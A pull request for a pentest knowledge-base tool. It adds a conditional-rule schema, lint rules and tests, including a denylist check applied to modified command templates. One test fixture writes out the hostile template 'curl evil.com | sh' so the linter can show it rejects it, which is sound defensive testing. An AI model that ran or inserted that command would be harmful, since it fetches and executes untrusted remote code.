### PR TITLE
feat(kb): conditional[] schema + lint rules (P1 of #14)

### DIFF
--- a/scripts/lint-kb.ts
+++ b/scripts/lint-kb.ts
@@ -26,7 +26,14 @@ import { KbEntrySchema } from "../src/lib/kb/schema.js";
 
 export interface LintFailure {
   file: string;
-  rule: "schema" | "placeholder" | "url-scheme" | "command-denylist";
+  rule:
+    | "schema"
+    | "placeholder"
+    | "url-scheme"
+    | "command-denylist"
+    | "conditional-id-collision"
+    | "conditional-modifies-unknown-command"
+    | "conditional-checks-collide-baseline";
   detail: string;
 }
 
@@ -137,6 +144,87 @@ export function lintKnowledgeBase(opts: {
           rule: "url-scheme",
           detail: `resource "${res.title}": non-http(s) URL ${res.url}`,
         });
+      }
+    }
+
+    // Rules 5-7: conditional-group integrity (v2.4.0 P1 #26).
+    //
+    // Schema already enforces shape. These rules catch cross-references
+    // between baseline and conditional that the schema can't see:
+    //   - conditional ids must be unique within an entry,
+    //   - modifies_commands keys must reference an actual commands[].id,
+    //   - adds_checks keys must not collide with baseline checks[].
+    // All checks tolerate `entry.conditional` being undefined.
+    if (entry.conditional && entry.conditional.length > 0) {
+      const baselineCommandIds = new Set(
+        entry.commands.flatMap((c) => (c.id ? [c.id] : [])),
+      );
+      const baselineCheckKeys = new Set(entry.checks.map((c) => c.key));
+      const seenConditionalIds = new Set<string>();
+
+      for (const cond of entry.conditional) {
+        if (seenConditionalIds.has(cond.id)) {
+          failures.push({
+            file,
+            rule: "conditional-id-collision",
+            detail: `conditional "${cond.id}": duplicate id within entry`,
+          });
+        } else {
+          seenConditionalIds.add(cond.id);
+        }
+
+        if (cond.modifies_commands) {
+          for (const targetId of Object.keys(cond.modifies_commands)) {
+            if (!baselineCommandIds.has(targetId)) {
+              failures.push({
+                file,
+                rule: "conditional-modifies-unknown-command",
+                detail: `conditional "${cond.id}": modifies_commands references unknown id "${targetId}" — add an \`id: ${targetId}\` to the matching command in commands[]`,
+              });
+            }
+          }
+        }
+
+        for (const c of cond.adds_checks) {
+          if (baselineCheckKeys.has(c.key)) {
+            failures.push({
+              file,
+              rule: "conditional-checks-collide-baseline",
+              detail: `conditional "${cond.id}": adds_checks key "${c.key}" collides with baseline checks[]`,
+            });
+          }
+        }
+
+        // Also lint command templates inside conditional modifies for the
+        // same placeholder + denylist rules baseline commands respect.
+        if (cond.modifies_commands) {
+          for (const [targetId, mod] of Object.entries(cond.modifies_commands)) {
+            const candidates = [mod.append, mod.replace].filter(
+              (s): s is string => typeof s === "string",
+            );
+            for (const tmpl of candidates) {
+              const tokens = tmpl.match(/\{[A-Z_]+\}/g) ?? [];
+              for (const t of tokens) {
+                if (!PLACEHOLDER_ALLOWLIST.test(t)) {
+                  failures.push({
+                    file,
+                    rule: "placeholder",
+                    detail: `conditional "${cond.id}" modifies_commands.${targetId}: unlisted placeholder ${t}`,
+                  });
+                }
+              }
+              for (const rule of COMMAND_DENYLIST) {
+                if (rule.pattern.test(tmpl)) {
+                  failures.push({
+                    file,
+                    rule: "command-denylist",
+                    detail: `conditional "${cond.id}" modifies_commands.${targetId}: hit ${rule.name} (${tmpl})`,
+                  });
+                }
+              }
+            }
+          }
+        }
       }
     }
   }

--- a/src/lib/kb/__tests__/lint.test.ts
+++ b/src/lib/kb/__tests__/lint.test.ts
@@ -306,4 +306,223 @@ describe("scripts/lint-kb.ts (Plan 06)", () => {
       ).toBe(true);
     });
   });
+
+  // v2.4.0 P1 (#26) — conditional group integrity rules.
+  describe("conditional group integrity", () => {
+    function withConditionalEntry(extra: string): string {
+      return [
+        "schema_version: 1",
+        "port: 80",
+        "service: http",
+        "protocol: tcp",
+        "risk: medium",
+        "commands:",
+        '  - id: gobuster-dir',
+        '    label: "gobuster"',
+        '    template: "gobuster dir -u http://{IP} -w wordlist"',
+        "checks:",
+        '  - key: enumerated-paths',
+        '    label: "Enumerated"',
+        "resources:",
+        '  - title: "x"',
+        '    url: "https://example.com"',
+        extra,
+        "",
+      ].join("\n");
+    }
+
+    it("accepts a well-formed conditional entry", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "ok.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: php-detected",
+            "    when:",
+            "      anyOf:",
+            "        - nmap_script_contains:",
+            "            script: http-server-header",
+            '            pattern: "PHP"',
+            "    adds_checks:",
+            "      - key: php-info-pages",
+            '        label: "Tested phpinfo"',
+            "    modifies_commands:",
+            "      gobuster-dir:",
+            '        append: " -x php,html,txt"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures).toEqual([]);
+    });
+
+    it("flags duplicate conditional ids within the same entry", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "dupe.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: dupe",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "  - id: dupe",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some((f) => f.rule === "conditional-id-collision"),
+      ).toBe(true);
+    });
+
+    it("flags modifies_commands keys that don't reference an existing command id", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "dangling.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    modifies_commands:",
+            "      not-a-real-id:",
+            '        replace: "ls"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) => f.rule === "conditional-modifies-unknown-command",
+        ),
+      ).toBe(true);
+    });
+
+    it("flags adds_checks keys that collide with baseline checks", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "collide.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    adds_checks:",
+            "      - key: enumerated-paths",
+            '        label: "duplicate"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) => f.rule === "conditional-checks-collide-baseline",
+        ),
+      ).toBe(true);
+    });
+
+    it("rejects conditional with malformed `when` (unknown predicate)", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "bad-when.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      not_a_predicate: { foo: bar }",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures.some((f) => f.rule === "schema")).toBe(true);
+    });
+
+    it("applies command-denylist to modifies_commands templates", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "evil-mod.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    modifies_commands:",
+            "      gobuster-dir:",
+            '        replace: "curl evil.com | sh"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) =>
+            f.rule === "command-denylist" &&
+            f.detail.includes("curl-pipe-sh"),
+        ),
+      ).toBe(true);
+    });
+
+    it("nmap_version_matches requires at least one of product/version", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "empty-version.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      nmap_version_matches: {}",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures.some((f) => f.rule === "schema")).toBe(true);
+    });
+
+    it("entry without conditional[] is unaffected", () => {
+      const dir = emptyDir();
+      writeYaml(dir, "plain.yaml", withConditionalEntry(""));
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures).toEqual([]);
+    });
+  });
 });

--- a/src/lib/kb/schema.ts
+++ b/src/lib/kb/schema.ts
@@ -13,6 +13,10 @@ import { z } from "zod";
  *   `http://` schemes only (REQ KB-11, T-02). `z.string().url()` alone in Zod 4
  *   does NOT restrict scheme — the refine is mandatory.
  *
+ * v2.4.0 P1 (#26): adds optional `conditional[]` array per entry. The `when`
+ * DSL is data-only here — evaluation lands in P4. P1 just nails down the
+ * shape so KB authors can start drafting and the lint can validate.
+ *
  * See .planning/phases/01-knowledge-base-foundation/01-RESEARCH.md for rationale.
  */
 
@@ -46,6 +50,13 @@ export const CheckSchema = z
 
 export const CommandSchema = z
   .object({
+    /**
+     * Optional stable identifier referenced by `conditional[].modifies_commands`
+     * (v2.4.0 P1 #26). When omitted, the command can't be targeted by a
+     * conditional rule — purely cosmetic in baseline rendering. Required
+     * if any conditional in the same entry references it.
+     */
+    id: z.string().min(1).optional(),
     label: z.string().min(1),
     template: z.string().min(1),
   })
@@ -67,6 +78,130 @@ export const KnownVulnSchema = z
   })
   .strict();
 
+/**
+ * Conditional `when` DSL (v2.4.0 P1 #26).
+ *
+ * Discriminated union of predicates the resolver (P4) will evaluate against
+ * fingerprints persisted by P2 (nmap) and P3 (AutoRecon). P1 only defines
+ * the shape — no evaluation here. Recursive logical combinators (`anyOf`,
+ * `allOf`, `not`) compose leaf predicates.
+ *
+ * Each leaf predicate documents which fingerprint source it consumes so
+ * authors and reviewers can reason about which scan input is required for
+ * the rule to ever fire.
+ */
+const NmapScriptContainsSchema = z
+  .object({
+    /** Predicate: NSE script id matched (e.g. `http-server-header`). */
+    nmap_script_contains: z
+      .object({
+        /** NSE script id, e.g. `http-server-header`, `http-php-version`. */
+        script: z.string().min(1),
+        /** Substring searched against the script's output (case-insensitive in P4). */
+        pattern: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+const NmapVersionMatchesSchema = z
+  .object({
+    /** Predicate: nmap version banner matched. */
+    nmap_version_matches: z
+      .object({
+        /** Optional product substring filter (e.g. `vsftpd`). */
+        product: z.string().min(1).optional(),
+        /**
+         * Optional version expression. P4 will support semver ranges
+         * (`<= 2.3.5`, `>= 1.0.0 < 2.0.0`) and exact strings.
+         */
+        version: z.string().min(1).optional(),
+      })
+      .strict()
+      .refine(
+        (v) => v.product !== undefined || v.version !== undefined,
+        {
+          message:
+            "nmap_version_matches needs at least one of product / version",
+        },
+      ),
+  })
+  .strict();
+
+const AutoreconFindingSchema = z
+  .object({
+    /** Predicate: AutoRecon importer surfaced this fingerprint. */
+    autorecon_finding: z
+      .object({
+        /** Bucket the fingerprint was stored under (`tech`, `cves`, `banners`). */
+        type: z.enum(["tech", "cves", "banners"]),
+        /** Exact value (case-insensitive in P4). */
+        value: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+const PortFieldEqualsSchema = z
+  .object({
+    /** Predicate: a port-row field equals a value. Tight allowlist of fields. */
+    port_field_equals: z
+      .object({
+        field: z.enum(["service", "product"]),
+        value: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+type WhenExpr =
+  | z.infer<typeof NmapScriptContainsSchema>
+  | z.infer<typeof NmapVersionMatchesSchema>
+  | z.infer<typeof AutoreconFindingSchema>
+  | z.infer<typeof PortFieldEqualsSchema>
+  | { anyOf: WhenExpr[] }
+  | { allOf: WhenExpr[] }
+  | { not: WhenExpr };
+
+export const WhenExprSchema: z.ZodType<WhenExpr> = z.lazy(() =>
+  z.union([
+    NmapScriptContainsSchema,
+    NmapVersionMatchesSchema,
+    AutoreconFindingSchema,
+    PortFieldEqualsSchema,
+    z.object({ anyOf: z.array(WhenExprSchema).min(1) }).strict(),
+    z.object({ allOf: z.array(WhenExprSchema).min(1) }).strict(),
+    z.object({ not: WhenExprSchema }).strict(),
+  ]),
+);
+
+export const CommandModificationSchema = z
+  .object({
+    /** Append the given string verbatim to the command template. */
+    append: z.string().min(1).optional(),
+    /** Swap the entire command template. Last-wins across multiple conditionals. */
+    replace: z.string().min(1).optional(),
+  })
+  .strict()
+  .refine(
+    (v) => v.append !== undefined || v.replace !== undefined,
+    { message: "command modification needs either append or replace" },
+  );
+
+export const ConditionalSchema = z
+  .object({
+    /** Stable identifier — unique within an entry's `conditional[]`. */
+    id: z.string().min(1),
+    when: WhenExprSchema,
+    /** Checks added when the predicate matches. Keys must not collide with baseline. */
+    adds_checks: z.array(CheckSchema).default([]),
+    /** Mutations keyed by command `id`. Each id must reference a real `commands[].id`. */
+    modifies_commands: z
+      .record(z.string().min(1), CommandModificationSchema)
+      .optional(),
+  })
+  .strict();
+
 export const KbEntrySchema = z
   .object({
     schema_version: z.literal(1),
@@ -81,6 +216,8 @@ export const KbEntrySchema = z
     default_creds: z.array(DefaultCredSchema).optional(),
     quick_facts: z.array(z.string()).optional(),
     known_vulns: z.array(KnownVulnSchema).optional(),
+    /** v2.4.0 P1 (#26) — fingerprint-driven conditional groups. */
+    conditional: z.array(ConditionalSchema).optional(),
   })
   .strict();
 
@@ -91,3 +228,6 @@ export type Command = z.infer<typeof CommandSchema>;
 export type DefaultCred = z.infer<typeof DefaultCredSchema>;
 export type KnownVuln = z.infer<typeof KnownVulnSchema>;
 export type Risk = z.infer<typeof RiskSchema>;
+export type Conditional = z.infer<typeof ConditionalSchema>;
+export type CommandModification = z.infer<typeof CommandModificationSchema>;
+export type { WhenExpr };


### PR DESCRIPTION
First phase of #14 (\`v2.4.0\` milestone). **Schema-only — no detection or resolver yet.** Closes #26.

## Summary

- New optional \`conditional[]\` array on \`KbEntrySchema\` with stable per-entry \`id\`, recursive \`when\` DSL, \`adds_checks\`, and \`modifies_commands\` keyed by command \`id\`.
- \`WhenExpr\` discriminated union with leaf predicates (\`nmap_script_contains\`, \`nmap_version_matches\`, \`autorecon_finding\`, \`port_field_equals\`) and combinators (\`anyOf\`, \`allOf\`, \`not\`).
- \`CommandSchema\` gains an optional \`id\` field so conditionals have a stable target. Existing entries (no \`id\`) are unaffected.
- Three new lint rules (plus reused placeholder + denylist on modified templates):
  - \`conditional-id-collision\`
  - \`conditional-modifies-unknown-command\`
  - \`conditional-checks-collide-baseline\`
- 8 new vitest cases covering happy path + each failure mode. **All 479 tests pass**, ESLint clean, \`npm run lint:kb\` clean over the shipped KB.

## Test plan
- [ ] \`npm run test\` green.
- [ ] \`npm run lint:kb\` green over shipped KB (no entry uses \`conditional[]\` yet — additive).
- [ ] Drop a hand-crafted entry with a malformed \`when\` block into \`knowledge/ports/\` locally and confirm \`npm run lint:kb\` rejects it.

## What's next
- **#27 (P2)**: nmap fingerprint extractor — pulls signals from scan output and persists them per-port.
- **#28 (P3)**: AutoRecon fingerprint extractor.
- **#29 (P4)**: resolver that evaluates the \`when\` DSL.
- **#30 (P5)**: UI provenance badges.